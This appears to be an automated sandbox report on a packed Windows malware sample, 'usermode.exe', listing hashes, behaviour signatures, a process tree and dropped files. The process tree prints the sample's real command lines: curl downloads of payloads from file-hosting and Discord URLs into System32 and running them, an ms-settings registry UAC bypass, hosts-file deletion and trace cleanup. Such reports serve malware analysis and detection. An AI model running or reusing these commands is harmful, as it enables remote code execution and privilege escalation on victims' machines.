Analysis

  • max time kernel
    20s
  • max time network
    22s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    30/10/2024, 13:56

General

  • Target

    usermode.exe

  • Size

    5.4MB

  • MD5

    fb4bf2834546449c2ce7593c9b152995

  • SHA1

    962351902ca2b130d5652e6b42bc7c5fdf8ab4d4

  • SHA256

    f63734e8c099081fb6f7386aaa960667e297a0b323d7b583d1a2cfcd974353dd

  • SHA512

    275d02f4871707f7b57b348f0a882abf98b3746bd7c5da80180d6b4a0cf67415ae0d3992b4b410235054f57c0a5c81216fd4a572d0a8e8059d2fe154fa72d2a8

  • SSDEEP

    98304:ApRYuEKLOdpy9owo8DQZpvSnHHQoCZ06i8ATTkPb7UzVC2wx7ETxZ:AsWOdpy9oX8oZti8UTmb7f2wx7El

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 22 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usermode.exe
    "C:\Users\Admin\AppData\Local\Temp\usermode.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3908
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe" >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4292
      • C:\Windows\system32\curl.exe
        curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe"
        3⤵
        • Drops file in System32 directory
        PID:2192
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\System32\secret.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\Windows\System32\secret.exe
        C:\Windows\System32\secret.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3400
        • C:\Windows\system32\cmd.exe
          /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3740
          • C:\Windows\system32\reg.exe
            reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            5⤵
            PID:3836
        • C:\Windows\system32\cmd.exe
          /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2608
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f
            5⤵
            • Modifies registry class
            PID:3788
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
            5⤵
            • Modifies registry class
            PID:2932
        • C:\Windows\system32\cmd.exe
          /c start /B ComputerDefaults.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4512
          • C:\Windows\system32\ComputerDefaults.exe
            ComputerDefaults.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3756
            • C:\Windows\system32\wscript.exe
              "wscript.exe" C:\Users\Admin\AppData\Local\Temp\542700.vbs
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:436
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                7⤵
                PID:1448
        • C:\Windows\system32\cmd.exe
          /c del /f C:\Users\Admin\AppData\Local\Temp\542700.vbs
          4⤵
          PID:1104
        • C:\Windows\system32\cmd.exe
          /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1688
          • C:\Windows\system32\reg.exe
            reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            5⤵
            • Modifies registry class
            PID:4816
        • C:\Windows\system32\cmd.exe
          /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1240
          • C:\Windows\system32\reg.exe
            reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            5⤵
            PID:4508
        • C:\Windows\system32\cmd.exe
          /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2144
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f
            5⤵
            • Modifies registry class
            PID:4036
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
            5⤵
            • Modifies registry class
            PID:2584
        • C:\Windows\system32\cmd.exe
          /c start /B ComputerDefaults.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3388
          • C:\Windows\system32\ComputerDefaults.exe
            ComputerDefaults.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:892
            • C:\Windows\system32\wscript.exe
              "wscript.exe" C:\Users\Admin\AppData\Local\Temp\168587.vbs
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:392
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1524
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe
                  C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
                  8⤵
                  • Executes dropped EXE
                  PID:3052
        • C:\Windows\system32\cmd.exe
          /c del /f C:\Users\Admin\AppData\Local\Temp\168587.vbs
          4⤵
          PID:1468
        • C:\Windows\system32\cmd.exe
          /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\system32\reg.exe
            reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            5⤵
            • Modifies registry class
            PID:2136
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf" >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\curl.exe
        curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf"
        3⤵
        PID:1488

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize: 1KB
    MD5: 67e486b2f148a3fca863728242b6273e
    SHA1: 452a84c183d7ea5b7c015b597e94af8eef66d44a
    SHA256: facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
    SHA512: d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize: 436B
    MD5: 971c514f84bba0785f80aa1c23edfd79
    SHA1: 732acea710a87530c6b08ecdf32a110d254a54c8
    SHA256: f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
    SHA512: 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize: 174B
    MD5: 3bf53b7cb0ef14526332140e3f06e30e
    SHA1: 73684a2e322f714d3cf7396cc467f4b2fbe48c60
    SHA256: 63d7227e22957e115ece214bf46e427d95782e2ed7c5be04b43bad30a50d9014
    SHA512: 82728bb630791419f845e5a1a9a67b210fb4065f9603616aca1d9446d080028a0a64bed10d5e405f453e32fbf5d31fb020a9ec38ba9ca01e843c97fe437c3eee

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize: 170B
    MD5: bd34d3e89ca124297388a6e74ba69449
    SHA1: 54742685dfa4f520e2e93b2024629c91c925ccfb
    SHA256: 4173a607877121ad103b1018726634f0d28bf6ca7ac86be683f162a6abbacd7b
    SHA512: 700573da5a8fb38ee6fc9f92b45f33d2d2a0ac6610eb572ef0cb164c686164d5dbdf07e1012606f57cad64102b00fc443fa9c1031d517d0d7c9cf5ab8593eb2d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe

    Filesize: 2.7MB
    MD5: 925efe96cdd4c38990ce77cf97f5218f
    SHA1: 6deeb34ba43549ac8a7d6b545257e6df64e29495
    SHA256: c0f88af9fb0d75921f09ead45882adb82a2b1222d728de0f10ae8a875ee757a4
    SHA512: 3d7a24dea82a9908ed599680dbe1caeadbee5cb04aa06a4c6310ceccd8f98f8ca9f0666434d48945e44ec48c3f4ef21d3c23df4252b4d5792995a4b1892014d3

  • C:\Users\Admin\AppData\Local\Temp\168587.vbs

    Filesize: 246B
    MD5: 0b4570ab9e0b9b3a1c729d2dfe4269cf
    SHA1: d8f47021a2000ec2160cfceeb59654d28d3b7ba4
    SHA256: d4aec27b2377d3267c10348eaacfaa97dbb2ca0c3f0f5170d905301a77ae0f9d
    SHA512: 0adf851c389281cbd1c28a6ac08691179dec2a536f1d68ce46a621e5d234dbb5cd826aaea2193a674e1396fdaa745f21fba9988cb2cb19736d0c153f3b86422e

  • C:\Users\Admin\AppData\Local\Temp\542700.vbs

    Filesize: 125B
    MD5: 8b4ed5c47fdddbeba260ef11cfca88c6
    SHA1: 868f11f8ed78ebe871f9da182d053f349834b017
    SHA256: 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
    SHA512: 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

  • C:\Windows\System32\secret.exe

    Filesize: 228KB
    MD5: 68487b48506703ac72bf48e57a5f6ffa
    SHA1: 7eb5a51f8ecead1e555d79db58bb43e61264b51b
    SHA256: f3ecc9924b3a625fcc54d59008706e41c830c6952bf836e77352a340251c8cae
    SHA512: 033f745e1c289ad4cd69b1494962fd6260484cb300c7556d76635908dbc5f54e626b5c21e130058c5d84b5978eff3628dd6fd8b56e35bf37c0a6f866ffb8cbb0

  • memory/3400-16-0x000001F6A1D40000-0x000001F6A1D41000-memory.dmp

    Filesize: 4KB

  • memory/3400-12-0x000001F6A1D20000-0x000001F6A1D21000-memory.dmp

    Filesize: 4KB

  • memory/3400-11-0x000001F6A0410000-0x000001F6A0411000-memory.dmp

    Filesize: 4KB

  • memory/3400-10-0x000001F6A0400000-0x000001F6A0401000-memory.dmp

    Filesize: 4KB

  • memory/3908-14-0x00007FF7BA1B7000-0x00007FF7BA518000-memory.dmp

    Filesize: 3.4MB

  • memory/3908-15-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp

    Filesize: 9.1MB

  • memory/3908-0-0x00007FF7BA1B7000-0x00007FF7BA518000-memory.dmp

    Filesize: 3.4MB

  • memory/3908-5-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp

    Filesize: 9.1MB

  • memory/3908-2-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp

    Filesize: 9.1MB

  • memory/3908-1-0x00007FF8E1A70000-0x00007FF8E1A72000-memory.dmp

    Filesize: 8KB